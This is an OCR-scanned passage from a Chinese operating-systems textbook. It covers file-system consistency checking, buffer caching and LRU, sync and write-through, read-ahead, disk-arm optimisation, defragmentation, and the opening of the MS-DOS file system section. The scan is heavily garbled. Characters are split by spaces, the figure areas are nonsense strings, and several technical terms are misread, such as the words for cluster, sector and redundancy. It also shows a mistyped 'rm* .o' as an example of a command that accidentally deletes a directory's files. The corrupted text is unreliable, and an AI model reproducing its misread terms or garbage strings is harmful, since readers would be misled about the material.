为 了 解决 文件 系统 的 不 一 致 问 题 , 很 多 计算 机 都 带 有 一 个 实用 程序 以 检验 文件 系统 的 一 致 性 。 例 如 ， 
UNIX 有 fsck， 而 Windows 用 scandisk。 系 统 启动 时 ， 特 别 是 崩溃 之 后 的 重新 启动 ， 可 以 运行 该 实用 程序 。 
下 面 我 们 介绍 在 UNIX 中 这 个 fsck 实 用 程序 是 怎样 工作 的 。scandisk 有 所 不 同 ， 因 为 它 工作 在 另 一 种 文件 
系统 上 ， 不 过 运用 文件 系统 的 内 在 元 余 进 行 修复 的 一 般 原 理 仍然 有 效 。 所 有 文件 系统 检验 程序 可 以 独立 
地 检验 每 个 文件 系统 (磁盘 分 区 ) 的 一 致 性 。 

一 致 性 检查 分 为 两 种 : 块 的 一 致 性 检查 和 文件 的 一 致 性 检查 。 在 检查 块 的 一 致 性 时 ， 程 序 构造 两 张 
表 ， 每 张 表 中 为 每 个 块 设立 一 个 计数 器 ， 都 初始 化 为 0。 第 一 个 表 中 的 计数 器 跟踪 该 块 在 文件 中 的 出 现 
次 数 ， 第 二 个 表 中 的 计数 器 跟踪 该 块 在 空闲 表 或 空闲 位 图 中 的 出 现 次 数 。 

接着 检验 程序 使 用 原始 设备 读 取 全 部 的 i 节 点 ， 忽 略 文件 的 结构 ， 只 返回 从 零 开 始 的 所 有 磁盘 块 。 
由 i 节点 开始 ， 可 以 建立 相应 文件 中 用 到 的 全 部 块 的 块 号 表 。 每 当 读 到 一 个 块 号 时 ， 该 块 在 第 一 个 表 中 
的 计数 器 加 1。 然 后 ， 该 程序 检查 空闲 表 或 位 图 ， 查 找 全 部 未 使 用 的 块 。 每 当 在 空闲 表 中 找到 一 个 块 时 ， 
就 会 使 它 在 第 二 个 表 中 的 相应 计数 器 加 1。 

如 果 文 件 系统 一 致 ， 则 每 一 块 或 者 在 第 一 个 表 计 数 器 中 为 1， 或 者 在 第 二 个 表 计 数 器 中 为 1， 如 
图 4-27a 所 示 。 但 是 当 系统 崩溃 后 ， 这 两 张 表 可 能 如 图 4-27b 所 示 ， 其 中 ， 磁 盘 块 2 没有 出 现在 任何 一 张 表 
中 ， 这 称 为 块 丢 失 。 尽 管 块 丢 失 不 会 造成 实际 的 损害 ， 但 它 的 确 浪费 了 磁盘 空间 ， 减 少 了 磁盘 容量 。 块 
丢失 问题 的 解决 很 容易 : 文件 系统 检验 程序 把 它们 加 到 空闲 表 中 即 可 。 

有 可 能 出 现 的 另 一 种 情况 如 图 4-27c 所 示 。 其 中 ， 块 4 在 空闲 表 中 出 现 了 2 次 (只 在 空闲 表 是 真正 意 
义 上 的 一 张 表 时 ， 才 会 出 现 重 复 ， 在 位 图 中 ， 不 会 发 生 这 类 情况 ) 。 解 决 方法 也 很 简单 : 只 要 重新 建立 
空闲 表 即 可 。 

最 糟 的 情况 是 ， 在 两 个 或 多 个 文件 中 出 现 同 一 个 数据 块 ， 如 图 4-27d 中 的 块 5。 如 果 其 中 一 个 文件 被 
删除 ， 块 5 会 添加 到 空闲 表 中 ， 导 致 一 个 块 同 时 处 于 使 用 和 空闲 两 种 状态 。 若 删除 这 两 个 文件 ， 那 么 在 
空闲 表 中 这 个 磁盘 块 会 出 现 两 次 。 

文件 系统 检验 程序 可 以 采取 相应 的 处 理 方法 是 ， 先 分 配 一 空闲 块 ， 把 块 5 中 的 内 容 复 制 到 空闲 块 中 ， 
然后 把 它 插 到 其 中 一 个 文件 之 中 。 这 样 文件 的 内 容 未 改变 (虽然 这 些 内 容 几 乎 可 以 肯定 是 不 对 的 ) ， 但 
至 少 保持 了 文件 系统 的 一 致 性 。 这 一 错误 应 该 报告 ， 由 用 户 检查 文件 受 损 情 况 。 
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块 号 块 号 
23456789101112131415 0123456789101112131415 


gogogonnn0oo00000 使 用 的 块 [s{sJo[sfols]]s]fofo]s]]sfolo} 使 用 的 块 
loloh Jo] ofofofo]s]xfofofofs]s] žm 。 [lololollolololol lololol | ER 


a) b) 


12345 67 8 9101112131415 2345 67 8 9101112131415 


0 
Lolhjohllllolollllolo 使 用 的 块 Torr fol Te ToT oL [| oto 使 用 的 块 
[ofof TofzlofoTolofr[Tolofof[1] zsrase [oof +fo]sfofo[ofo]s[sJofofo]s]s] ER 


c) d) 
图 4-27 文件 系统 状态 : a) 一 致 b 块 丢失 ，c) 空闲 表 中 有 重复 块 ，d) 重复 数据 块 


除 检查 每 个 磁盘 块 计数 的 正确 性 之 外 ,文件 系统 检验 程序 还 检查 目录 系统 。 此 时 也 要 用 到 一 张 计数 
器 表 ， 但 这 时 是 一 个 文件 〈 而 不 是 一 个 块 ) 对 应 于 一 个 计数 器 。 程 序 从 根 目录 开始 检验 ， 沿 着 目录 树 递 
归 下 降 ， 检 查 文 件 系 统 中 的 每 个 目录 。 对 每 个 目录 中 的 每 个 文件 ， 将 文件 使 用 计数 器 加 1。 要 注意 ， 由 
于 存在 硬 链接 ， 一 个 文件 可 能 出 现在 两 个 或 多 个 目录 中 。 而 遇 到 符号 链接 是 不 计数 的 ， 不 会 对 目标 文件 
的 计数 器 加 1。 

在 检验 程序 全 部 完成 后 ， 得 到 一 张 由 i 节点 号 索引 的 表 ， 说 明 每 个 文件 被 多 少 个 目录 包含 。 然 后 ， 
检验 程序 将 这 些 数字 与 存储 在 文件 i 节 点 中 的 链接 数目 相 比 较 。 当 文件 创建 时 ， 这 些 计数 器 从 1 开始 ， 随 
着 每 次 对 文件 的 一 个 〈 硬 ) 链接 的 产生 ， 对 应 计数 器 加 1。 如 果 文 件 系 统一 致 ， 这 两 个 计数 应 相等 。 但 
是 ， 有 可 能 出 现 两 种 错误 ， 即 i 节 点 中 的 链接 计数 太 大 或 者 太 小 。 

如 果 i 节 点 的 链接 计数 大 于 目录 项 个 数 ， 这 时 即使 所 有 的 文件 都 从 目录 中 删除 ， 这 个 计数 仍 是 非 0，i 
节点 不 会 被 删除 。 该 错误 并 不 严重 ， 却 因为 存在 不 属于 任何 目录 的 文件 而 浪费 了 磁盘 空间 。 为 改正 这 一 
错误 ， 可 以 把 i 节点 中 的 链接 计数 设 成 正确 值 。 

另 一 种 错误 则 是 潜在 的 灾难 。 如 果 同 一 个 文件 链接 两 个 目录 项 ， 但 其 i 节点 链接 计数 只 为 1， 如 果 删 
除了 任何 一 个 目录 项 ,对 应 i 节点 链接 计数 变 为 0。 当 i 节点 计数 为 0 时 , 文件 系统 标志 该 节点 为 “未 使 用 ”， 
并 释放 其 全 部 块 。 这 会 导致 其 中 一 个 目录 指向 一 未 使 用 的 i 节点 ， 而 很 有 可 能 其 块 马上 就 被 分 配给 其 他 
文件。 解决 方法 同样 是 把 i 节点 中 链接 计数 设 为 目录 项 的 实际 个 数值 。 

由 于 效率 上 的 考虑 ， 以 上 的 块 检查 和 目录 检查 经 常 被 集成 到 一 起 ( 即 仅 对 i 节点 扫描 一 遍 )。 当 然 也 
有 一 些 其 他 检查 方法 。 例 如 ， 目 录 是 有 明确 格式 的 ， 包 含有 i 节 点 数目 和 ASCII 文 件 名 ， 如 果 某 个 目录 的 i 
节点 编号 大 于 磁盘 中 i 节点 的 实际 数目 ， 说 明 这 个 目录 被 破坏 了 。 

再 有 ， 每 个 i 节 点 都 有 一 个 访问 权限 项 。 一 些 访问 权限 是 合法 的 ， 人 比如 0007， 它 不 允 
许 文 件 所 有 者 及 所 在 用 户 组 的 成 员 进 行 访问 ,而 其 他 的 用 户 却 可 以 读 、 写 、 执 行 此 文件 。 在 这 类 情况 下 ， 
有 必要 报告 系统 已 经 设置 了 其 他 用 户 权 限 高 于 文件 所 有 者 权限 这 一 ee, MAINE FERAL 
很 可 疑 。 为 超级 用 户 所 拥有 ， 但 放 在 用 户 目录 下 ， 且 设置 了 SETUID 位 的 文件 ， 可 能 也 有 安全 问题 ， 因 
为 任何 用 户 执行 这 类 文件 都 需要 超级 用 户 的 权限 。 可 以 轻松 地 列 出 一 长 串 特殊 的 情况 ， 尽 管 这 些 情 况 合 
法 ， 但 报告 却 是 有 必要 的 。 

以 上 讨论 了 防止 因 系统 崩溃 而 破坏 用 户 文件 的 问题 ， 某 一 些 文件 系统 也 防止 用 户 自身 的 误 操 作 。 如 
果 用 户 想 输 入 

rm *.o 
删除 全 部 以 .o 结 尾 的 文件 (编译 器 生成 的 目标 文件 )， 但 不 幸 键入 了 

rm* .o 
(注意 ， 星 号 后 面 有 一 空格 ) ， 则 rm 命令 会 删除 全 部 当前 目录 中 的 文件 ， 然 后 报告 说 找 不 到 文件 .o。 在 


Windows 中 ， 删 除 的 文件 被 转移 到 回收 站 目录 中 〈 一 个 特别 的 目录 ) ， 稍 后 若 需 要 ， 可 以 从 那里 还 原文 
件 。 当 然 ， 除 非 文件 确实 从 回收 站 目录 中 删除 ， 否 则 不 会 释放 空间 。 
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4.4.4 文件 系统 性 能 

访问 磁盘 比 访问 内 存 慢 得 多 。 读 内 存 中 一 个 32 位 字 大 概要 10ns。 从 硬盘 上 读 的 速度 大 约 为 100MB/s， 
对 每 32 位 字 来 说 ， 大 约 要 慢 4 倍 ， 还 要 加 上 5~10ms 寻 道 时 间 ， 并 等 待 所 需 的 扇面 抵达 磁头 下 。 如 果 只 需 
要 一 个 字 ， 内 存 访问 则 比 磁盘 访问 快 百 万 数量 级 。 考 虑 到 访问 时 间 的 这 个 差异 ， 许 多 文件 系统 采用 了 各 
种 优化 措施 以 改善 性 能 。 本 节 我 们 将 介绍 其 中 三 种 方法 。 

1. 高 速 缓存 

最 常用 的 减少 磁盘 访问 次 数 技术 是 块 高 速 缓存 (block cache) 或 者 缓冲 区 高 速 缓存 (buffer cache), ZE 
本 书 中 ， 高 速 缓存 指 的 是 一 系列 的 块 ， 它 们 在 逻辑 上 属于 磁盘 ， 但 实际 上 基于 性 能 的 考虑 被 保存 在 内 存 中 。 

管理 高 速 缓存 有 不 同 的 算法 ， 常 用 的 算法 是 : 检查 全 部 的 读 请 求 ， 查 看 在 高 速 缓存 中 是 否 有 所 需要 
的 块 。 如 果 存 在 ， 可 执行 读 操作 而 无 须 访 问 磁盘 。 如 果 该 块 不 在 高 速 缓存 中 ， 首 先 要 把 它 读 到 高 速 缓存 ， 
再 复制 到 所 需 地 方 。 之 后 ， 对 同一 个 块 的 请 求 都 通过 高 速 缓存 完成 。 

高 速 缓存 的 操作 如 图 4-28 所 示 。 由 于 在 散 列 表 前 端 (LRU) 
高 速 缓存 中 有 许多 块 (通常 有 上 千 块 )， 所 
以 需要 有 某 种 方法 快速 确定 所 需要 的 块 是 否 SIn Bal ml jeal Bi as 
存在 。 常 用 方法 是 将 设备 和 磁盘 地 址 进行 散 
列 操 作 ， 然 后 ， 在 散 列表 中 查找 结果 。 具 有 
相同 散 列 值 的 块 在 一 个 链表 中 连接 在 一 起 ， 
这 样 就 可 以 沿 着 冲突 链 查找 其 他 块 。 

如 果 高 速 缓存 已 满 ， 此 时 需要 调 入 新 的 图 4-28 缓冲 区 高 速 缓存 数据 结构 
块 ， 则 要 把 原来 的 某 一 块 调 出 高 速 缓存 (如 果 要 调 出 的 块 在 上 次 调和 以 后 修改 过 ， 则 要 把 它 写 回 磁盘 ) 。 
这 种 情况 与 分 页 非常 相似 ， 所 有 常用 的 页 面 置 换算 法 在 第 3 章 中 已 经 介绍 ， 例 如 FIFO 算 法 、 第 二 次 机 会 
算法 、LRU 算 法 等 ， 它 们 都 适用 于 高 速 缓存 。 与 分 页 相 比 ， 高 速 缓存 的 好 处 在 于 对 高 速 缓存 的 引用 不 很 
频繁 ， 所 以 按 精确 的 LRU 顺 序 在 链表 中 记录 全 部 的 块 是 可 行 的 。 

在 图 4-28 中 可 以 看 到 ， 除 了 散 列表 中 的 冲突 链 之 外 ， 还 有 一 个 双向 链表 把 所 有 的 块 按照 使 用 时 间 的 
先后 次 序 链接 起 来 ， 近 来 使 用 最 少 的 块 在 该 链表 的 前 端 ， 而 近来 使 用 最 多 的 块 在 该 链表 的 后 端 。 当 引用 
某 个 块 时 ， 该 块 可 以 从 双向 链表 中 移 走 ， 并 放置 到 该 表 的 尾部 去 。 用 这 种 方法 ， 可 以 维护 一 种 准确 的 
LRU 顺 序 。 

但 是 ， 这 又 带 来 了 意 想不到 的 难题 。 现 在 存在 一 种 情形 ， 使 我 们 有 可 能 获得 精确 的 LRU ， 但 是 碰巧 
该 LRU 却 又 不 符合 要 求 。 这 个 问题 与 前 一 节 讨 论 的 系统 崩 误 和 文件 一 致 性 有 关 。 如 果 一 个 关键 块 (比如 
i 节点 块 ) 读 进 了 高 速 缓存 并 做 过 修改 ， 但 是 没有 写 回 磁盘 ， 这 时 ， 系 统 崩溃 会 导致 文件 系统 的 不 一 致 。 
如 果 把 i 节 点 块 放 在 LRU 链 的 尾部 ， 在 它 到 达 链 首 并 写 回 磁盘 前 ， 有 可 能 需要 相当 长 的 一 段 时 间 。 

此 外 ， 某 一 些 块 ， 如 i 节点 块 ， 极 少 可 能 在 短 时 间 内 被 引用 两 次 。 基 于 这 些 考 虑 需要 修改 LRU 方 案 ， 
并 应 注意 如 下 两 点 : 

1) 这 一 块 是 否 不 久 后 会 再 次 使 用 ? 

2) 这 一 块 是 否 与 文件 系统 一 致 性 有 本 质 的 联系 ? 

考虑 以 上 两 个 问题 时 ， 可 将 块 分 为 节点 块 、 间 接 块 、 目 录 块 、 满 数据 块 、 部 分 数据 块 等 几 类 。 把 
有 可 能 最 近 不 再 需要 的 块 放 在 LRU 链 表 的 前 部 ， 而 不 是 LRU 链 表 的 后 端 ， 于 是 它们 所 占用 的 缓冲 区 可 以 
很 快 被 重用 。 对 很 快 就 可 能 再 次 使 用 的 块 ， 比 如 正在 写 和 人 的 部 分 满 数据 块 ， 可 放 在 链表 的 尾部 ， 这 样 它 
们 能 在 高 速 缓存 中 保存 较 长 的 一 段 时 间 。 

第 二 个 问题 独立 于 前 一 个 问题 。 如 果 关 系 到 文件 系统 一 致 性 (除数 据 块 之 外 ， 其 他 块 基本 上 都 是 这 
PE) 的 某 块 被 修改 ， 都 应 立即 将 该 块 写 回 磁盘 ， 不 管 它 是 否 被 放 在 LRU 链 表 尾 部 。 将 关键 块 快速 写 回 磁 
盘 ， 将 大 大 减少 在 计算 机 崩溃 后 文件 系统 被 破坏 的 可 能 性 。 用 户 的 文件 崩溃 了 ， 该 用 户 会 不 高 兴 ， 但 是 
如 果 整 个 文件 系统 都 丢失 了 ， 那 么 这 个 用 户 会 更 生气 。 

尽管 用 这 类 方法 可 以 保证 文件 系统 一 致 性 不 受到 破坏 ， 但 我 们 仍然 不 希望 数据 块 在 高 速 缓存 中 放 很 
久之 后 才 写 入 磁盘 。 设 想 某 人 正在 用 个 人 计算 机 编写 一 本 书 。 尽 管 作者 让 编辑 程序 将 正在 编辑 的 文件 定 


后 端 (MRU) 
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期 写 回 磁盘 ， 所 有 的 内 容 只 存在 高 速 缓存 中 而 不 在 磁盘 上 的 可 能 性 仍然 非常 大 。 如 果 这 时 系统 崩溃， 文 
件 系统 的 结构 并 不 会 被 破坏 ， 但 他 一 整 天 的 工作 就 会 丢失 。 

即使 只 发 生 几 次 这 类 情况 ， 也 会 让 人 感到 不 愉快 。 系 统 采用 两 种 方法 解决 这 一 问题 。 在 UNIX 系 统 
中 有 一 个 系统 调用 sync， 它 强制 性 地 把 全 部 修改 过 的 块 立 即 写 回 磁盘 。 系 统 启动 时 ， 在 后 台 运 行 一 个 通 
常 名 为 update 的 程序 ， 它 在 无 限 循环 中 不 断 执行 sync 调 用 ， 每 两 次 调用 之 间 休 眠 30s。 于 是 ， 系 统 即使 
崩溃 ， 也 不 会 丢失 超过 30 秒 的 工作 。 

虽然 目前 Windows 有 一 个 等 价 于 sync 的 系统 调用 一 一 FlushFileBuffers， 不 过 过 去 没有 。 相 反 ， 
Windows 采 用 一 个 在 某 种 程度 上 比 UNIX 方 式 更 好 ( 某 种 程度 更 坏 ) 的 策略 。 其 做 法 是 ， 只 要 被 写 人 高 
速 缓存 ， 就 把 每 个 被 修改 的 块 写 回 磁盘 。 将 高 速 缓存 中 所 有 被 修改 的 块 立即 写 回 磁盘 称 为 通 写 高 速 缓存 
(write-through cache) 。 与 非 通 写 高 速 缓存 相 比 ， 通 写 高 速 缓存 需要 更 多 的 磁盘 IO。 

若 某 程序 要 写 满 1KB 的 块 ， 每 次 写 一 个 字符 ， 这 时 可 以 看 到 这 两 种 方法 的 区 别 。UNIX 在 高 速 缓存 
中 保存 全 部 字符 ， 并 且 每 30 秒 把 该 块 写 回 磁盘 一 次 ， 或 者 当 从 高 速 缓存 删除 这 一 块 时 ， 将 该 块 写 回 磁盘 。 
在 通 写 高 速 缓 在 里 ， 每 写 和 一 字符 就 要 访问 一 次 磁盘 。 当 然 ， 多 数 程序 有 内 部 缓冲 ， 通 常情 况 下 ， 在 每 
次 执行 write 系统 调用 时 并 不 是 只 写 入 一 个 字符 ， 而 是 写 入 一 行 或 更 大 的 单位 。 

采用 这 两 种 不 同 的 高 速 缓存 策略 的 结果 是 : 在 UNIX 系 统 中 ， 若 不 调用 sync 就 移动 磁盘 ， 人 往往 会 导 
致 数据 丢失 ， 在 被 毁坏 的 文件 系统 中 也 经 常 如 此 。 而 在 通 写 高 速 缓存 中 ， 就 不 会 出 现 这 类 情况 。 选 择 不 
同 策略 的 原因 是 ， 在 UNIX 开 发 环境 中 ， 全 部 磁盘 都 是 硬盘 ， 不 可 移动 。 而 第 一 代 Windows 文件 源 自 
MS-DOS， 是 从 软盘 世界 中 发 展 起 来 的 。 由 于 UNIX 方 案 有 更 高 的 效率 它 成 为 当然 的 选择 (但 可 靠 性 更 
差 )， 随 着 硬盘 成 为 标准 ， 它 目前 也 用 在 Windows 的 磁盘 上 。 但 是 ，NTFS 使 用 其 他 方法 (日志 ) 改善 其 
可 靠 性 ， 这 在 前 面 已 经 讨论 过 。 

一 些 操 作 系 统 将 高 速 缓存 与 页 缓存 集成 ， 这 种 方式 在 支持 内 存 映 射 文 件 的 时 候 特 别 吸 引 人 。 如 果 一 
个 文件 被 映射 到 内 存 上 ， 则 它 其 中 的 一 些 页 就 会 在 内 存 中 ， 因 为 它们 被 要 求 按 页 进入 。 这 些 页 面 与 在 高 
速 缓 存 中 的 文件 块 几乎 没有 不 同 。 在 这 种 情况 下 ， 它 们 能 被 以 同样 的 方式 来 对 待 ， 也 就 是 说 ， 用 一 个 缓 
存 来 同时 存储 文件 块 与 页 。 

2. 块 提前 读 

第 二 个 明显 提高 文件 系统 性 能 的 技术 是 : 在 需要 用 到 块 之 前 ， 试 图 提前 将 其 写 入 高 速 缓存 ， 从 而 提 
高 命中 率 。 特 别 地 ， 许 多 文件 都 是 顺序 读 的 。 如 果 请 求 文 件 系 统 在 某 个 文件 中 生成 块 &， 文 件 系 统 执 行 
相关 操作 且 在 完成 之 后 ， 会 在 用 户 不 察觉 的 情形 下 检查 高 速 缓存 ， 以 便 确定 块 ktl 是 否 已 经 在 高 速 缓存 。 
如 果 还 不 在 ， 文 件 系 统 会 为 块 kt1 安 排 一 个 预 读 ， 因 为 文件 系统 希望 在 需要 用 到 该 块 时 ， 它 已 经 在 高 速 
缓存 或 者 至 少 马 上 就 要 在 高 速 缓存 中 了 。 

当然 ， 块 提前 读 策略 只 适用 于 实际 顺序 读 取 的 文件 。 对 随机 访问 文件 ， 提 前 读 丝毫 不 起 作用 。 相 反 ， 
它 还 会 帮 倒 忙 ， 因 为 读 取 无 用 的 块 以 及 从 高 速 缓存 中 删除 潜在 有 用 的 块 将 会 占用 固定 的 磁盘 带宽 (如 果 
有 “ 脏 ” 块 的 话 ， 还 需要 将 它们 写 回 磁盘 ， 这 就 占用 了 更 多 的 磁盘 带宽 )。 那 么 提前 读 策略 是 否 值得 采 
用 呢 ? 文件 系统 通过 跟踪 每 一 个 打开 文件 的 访问 方式 来 确定 这 一 点 。 例 如 ， 可 以 使 用 与 文件 相关 联 的 某 
个 位 协助 跟踪 该 文件 到 底 是 “顺序 访问 方式 ”还 是 “随机 访问 方式 ”。 在 最 初 不 能 确定 文件 属于 哪 种 存 
取 方 式 时 ， 先 将 该 位 设置 成 顺序 访问 方式 。 但 是 ， 查 找 一 完成 ， 就 将 该 位 清除 。 如 果 再 次 发 生 顺 序 读 取 ， 
就 再 次 设置 该 位 。 这 样 ， 文 件 系统 可 以 通过 合理 的 猜测 ， 确 定 是 否 应 该 采取 提前 读 的 策略 。 即 便 弄 错 了 
一 次 也 不 会 产生 严重 后 果 ， 不 过 是 浪费 一 小 段 磁 盘 的 带宽 罢了 。 

3. 减少 磁盘 臂 运 动 

高 速 缓存 和 块 提前 读 并 不 是 提高 文件 系统 性 能 的 唯一 方法 。 另 一 种 重要 技术 是 把 有 可 能 顺序 访问 的 
块 放 在 一 起 ， 当 然 最 好 是 在 同一 个 柱 面 上 ， 从 而 减少 磁盘 臂 的 移动 次 数 。 当 写 一 个 输出 文件 时 ， 文 件 系 
统 就 必须 按照 要 求 一 次 一 次 地 分 配 磁盘 块 。 如 果 用 位 图 来 记录 空闲 块 ， 并 且 整 个 位 图 在 内 存 中 ， 那 么 选 
择 与 前 一 块 最 近 的 空闲 块 是 很 容易 的 。 如 果 用 空闲 表 ， 并 且 链 表 的 一 部 分 存在 磁盘 上 ， 要 分 配 紧 邻 着 的 
空闲 块 就 困难 得 多 。 

不 过 ， 即 使 采用 空闲 表 ， 也 可 以 采用 块 敌 技术 。 这 里 用 到 一 个 小 技巧 ， 即 不 用 块 而 用 连续 块 铸 来 跟 
踪 磁 盘存 储 区 。 如 果 一 个 遍 区 有 512 个 字 节 ， 有 可 能 系统 采用 1KB 的 块 〈2 个 遍 区 ) ， 但 却 按 每 2 块 (4 个 
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BE) 一 个 单位 来 分 配 磁盘 存储 区 。 这 和 2KB 的 磁盘 块 并 不 相同 ， 因 为 在 高 速 缓存 中 它 依 然 使 用 IKB 的 
块 ， 磁 盘 与 内 存 数据 之 间 传送 也 是 以 IKB 为 单位 进行 ， 但 在 一 个 空闲 的 系统 上 顺序 读 取 文 件 ， 寻 道 的 次 
数 可 以 减少 一 半 ， 从 而 使 文件 系统 的 性 能 大 大 改善 。 若 考虑 旋转 定位 则 可 以 得 到 这 类 方案 的 变 体 。 在 分 
配 块 时 ， 系 统 尽量 把 一 个 文件 中 的 连续 块 存放 在 同一 柱 面 上 。 

在 使 用 i 节 点 或 任何 类 似 帮 点 的 系统 中 ， 另 一 个 性 能 瓶颈 是 ， 读 取 一 个 很 短 的 文件 也 需要 两 次 磁盘 
访问 : 一 次 是 访问 节点， 另 一 次 是 访问 块 。 通 常情 况 下 ，i 节 点 的 放置 如 图 4-29a 所 示 。 其 中 ， 全 部 i 节点 
都 放 在 靠近 磁盘 开始 位 置 ， 所 以 i 节点 和 它 指向 的 块 之 间 的 平均 距离 是 柱 面 数 的 一 半 ， 这 将 需要 较 长 的 
寻 道 时 间 。 i 

| 磁盘 被 划分 为 柱 面 组 ， 
es BAEC 
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图 4-29 ”a) i 节点 放 在 磁盘 开始 位 置 ，b) 磁盘 分 为 柱 面 组 ， 每 组 有 自己 的 块 和 i 节点 


一 个 简单 的 改进 方法 是 ， 在 磁盘 中 部 而 不 是 开始 处 存放 i 节点 ， 此 时 ， 在 i 节点 和 第 一 块 之 间 的 平均 
寻 道 时 间 减 为 原来 的 一 半 。 另 一 种 做 法 是 : 将 磁盘 分 成 多 个 柱 面 组 ， 每 个 柱 面 组 有 自己 的 i 节点、 数据 块 
和 空闲 表 (McKusick 等 人 ，1984)， 见 图 4-29b。 在 文件 创建 时 ， 可 选取 任 一 节点， 但 选 定之 后 ， 首 先 
在 该 地 点 所 在 的 柱 面 组 上 查找 块 。 如 果 在 该 柱 面 组 中 没有 空闲 的 块 ， 就 选用 与 之 相 邻 的 柱 面 组 的 一 个 块 。 

当然 ， 仅 当 磁 盘 中 装 有 磁盘 臂 的 时 候 ， 讨 论 寻 道 时 间 和 旋转 时 间 才 是 有 意义 的 。 越 来 越 多 的 电脑 开 
始 装配 不 带 移 动 部 件 的 固态 硬盘 (SSD)。 对 于 这 些 硬盘 ， 由 于 采用 了 和 内 存 同样 的 制造 技术 ， 使 得 随 
机 访问 与 顺序 访问 在 传输 速度 上 已 经 较为 相近 ， 传 统 硬盘 的 许多 问题 就 消失 了 。 不 幸 的 是 ， 新 的 问题 又 
随 之 出 现 。 

例如 ， 固 态 硬盘 在 读 取 、 写 人 和 删除 时 表现 出 一 些 特性 ， 尤 其 是 每 一 块 只 可 写 信 有限 次 数 的 特征 ， 
导致 使 用 时 需要 十 分 小 心 以 达到 均匀 分 散 磨损 的 目的 。 


4.4.5 磁盘 碎片 整理 

在 初始 安装 操作 系统 后 ， 从 磁盘 的 开始 位 置 ， 一 个 接 一 个 地 连续 安装 了 程序 与 文件 。 所 有 的 空闲 磁 
盘 空 间 放 在 一 个 单独 的 、 与 被 安装 的 文件 邻近 的 单元 里 。 但 随 着 时 间 的 流逝 ， 文 件 被 不 断 地 创建 与 删除 ， 
于 是 磁盘 会 产生 很 多 碎片 ， 文 件 与 空 穴 到 处 都 是 。 结 果 是 ， 当 创建 一 个 新 文件 时 ， 它 使 用 的 块 会 散布 在 
整个 磁盘 上 ， 造 成 性 能 的 降低 。 

磁盘 性 能 可 以 通过 如 下 方式 恢复 : 移动 文件 使 它们 相 邻 ， 并 把 所 有 的 (至 少 是 大 部 分 的 ) 空闲 空间 
放 在 一 个 或 多 个 大 的 连续 的 区 域内 。Windows 有 一 个 程序 defrag 就 是 从 事 这 个 工作 的 。Windows 的 用 户 
应 该 定期 使 用 它 ， 当 然 ，SSD 盘 除外 。 

磁盘 碎片 整理 程序 会 在 一 个 在 分 区 未 端的 连续 区 域内 有 大 量 空闲 空间 的 文件 系统 上 很 好 地 运行 。 这 
段 空 间 会 允许 磁盘 碎片 整理 程序 选择 在 分 区 开始 端的 碎片 文件 ， 并 复制 它们 所 有 的 块 放 到 空闲 空间 内 。 
这 个 动作 在 磁盘 开始 处 释放 出 一 个 连续 的 块 空间 ， 这 样 原始 或 其 他 的 文件 可 以 在 其 中 相 邻 地 存放 。 这 个 
过 程 可 以 在 下 一 大 块 的 磁盘 空间 上 重复 ， 并 继续 下 去 。 

有 些 文件 不 能 被 移动 ， 包 括 页 文件 、 休 卢 文 件 以 及 日 志 ， 因 为 移动 这 些 文件 所 需 的 管理 成 本 要 大 于 
移动 它们 所 获得 的 收益 。 在 一 些 系 统 中 ， 这 些 文件 是 固定 大 小 的 连续 的 区 域 ， 因 此 它们 不 需要 进行 碎片 
整理 。 这 类 文件 缺乏 灵活 性 会 造成 一 些 问题 ,一 种 情况 是 ， 它 们 恰好 在 分 区 的 末端 附近 并 且 用 户 想 减 小 
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分 区 的 大 小 。 解 决 这 种 问题 的 唯一 的 方法 是 把 它们 一 起 删除 ， 改 变 分 区 的 大 小 ， 然 后 再 重新 建立 它们 。 

Linux 文 件 系 统 (特别 是 ext2 和 ext3) 由 于 其 选择 磁盘 块 的 方式 ， 在 磁盘 碎片 整理 上 一 般 不 会 遭受 像 
Windows 那 样 的 困难 ， 因 此 很 少 需要 手动 的 磁盘 碎片 整理 。 而 且 ， 固 态 硬盘 并 不 受 磁盘 碎片 的 影响 。 事 
实 上 ， 在 固态 硬盘 上 做 磁盘 碎片 整理 反倒 是 多 此 一 举 ， 不 仅 没有 提高 性 能 ， 反 而 磨损 了 固态 硬盘 。 所 以 
碎片 整理 只 会 缩短 固态 硬盘 的 寿命 。 


4.5 文件 系统 实例 


在 这 一 节 ， 我 们 将 讨论 文件 系统 的 几 个 实例 ， 包 括 从 相对 简单 的 文件 系统 到 十 分 复杂 的 文件 系统 。 
现代 流行 的 UNIX 文 件 系 统 和 Windows 8 自 带 文件 系统 在 本 书 的 第 10 章 和 第 11 章 有 详细 介绍 ， 在 此 就 不 再 
讨论 了 。 但 是 我 们 有 必要 来 看 看 这 些 文件 系统 的 前 身 。 

4.5.1 MS-DOS 文 件 系统 l 

MS-DOS 文 件 系统 是 第 一 个 IBM PC 系列 所 采用 的 文件 系统 。 它 也 是 Windows 98 与 Windows ME 所 采 
用 的 主要 的 文件 系统 。Windows 2000, Windows XP 与 Windows Vista 上 也 支持 它 ， 虽 然 除 了 软盘 以 外 ， 
它 现在 已 经 不 再 是 新 的 PC 的 标准 了 。 但 是 , 它 和 它 的 扩展 (FAT-32) 一 直 被 许多 嵌入 式 系 统 所 广泛 使 用 。 
大 部 分 的 数码 相机 使 用 它 。 许 多 MP3 播 放 器 只 能 使 用 它 。 流 行 的 苹果 公司 的 iPod 使 用 它 作为 默认 的 文件 
系统 ， 尽 管 知识 渊博 的 骇 客 可 以 重新 格式 化 iPod 并 安装 一 个 不 同 的 文件 系统 。 使 用 MS-DOS 文 件 系统 的 
电子 设备 的 数量 现在 要 远 远 多 于 过 去 ， 并 且 当 然 远 远 多 于 使 用 更 现代 的 NTFS 文 件 系统 的 数量 。 因 此 ， 
我 们 有 必要 看 一 看 其 中 的 一 些 细节 。 

要 读 文件 时 ，MS-DOS 程 序 首 先 要 调用 open 系 统 调 用 ， 以 获得 文件 的 句柄 。open 系 统 调 用 识别 一 
个 路 径 ， 可 以 是 绝对 路 径 或 者 是 相对 于 现在 工作 目录 的 路 径 。 路 径 是 一 个 分 量 一 个 分 量 地 查找 的 ， 直 到 
查 到 最 终 的 目录 并 读 进 内 存 。 然 后 开始 搜索 要 打开 的 文件 。 

尽管 MS-DOS 的 目录 是 可 变 大 小 的 ， 但 它 使 用 固定 的 32 字 节 的 目录 项 ，MS-DOS 的 目录 项 的 格式 如 
图 4-30 所 示 。 它 包含 文件 名 、 属 性 、 建 立 日 期 和 时 间 、 起 始 块 和 具体 的 文件 大 小 。 在 每 个 分 开 的 域 中 ， 
